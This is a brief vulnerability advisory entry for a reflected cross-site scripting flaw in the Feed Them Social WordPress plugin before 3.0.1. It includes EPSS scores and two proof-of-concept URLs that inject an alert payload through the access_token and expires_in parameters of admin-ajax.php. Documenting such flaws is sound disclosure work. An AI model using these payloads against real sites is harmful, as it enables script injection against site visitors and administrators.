Lucene search

K
wpexploitDc11WPEX-ID:4A3B3023-E740-411C-A77C-6477B80D7531
HistoryJul 26, 2022 - 12:00 a.m.

Feed Them Social < 3.0.1 - Reflected Cross-Site Scripting

2022-07-2600:00:00
dc11
86

0.001 Low

EPSS

Percentile

43.6%

The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting

Both can be used against authenticated and unauthenticated users

https://example.com/wp-admin/admin-ajax.php?action=fts_refresh_token_ajax&access_token=<img src onerror=alert(/XSS/)>

https://example.com/wp-admin/admin-ajax.php?action=fts_refresh_token_ajax&feed=instagram&expires_in=<img src onerror=alert(/XSS/)>

0.001 Low

EPSS

Percentile

43.6%

Related for WPEX-ID:4A3B3023-E740-411C-A77C-6477B80D7531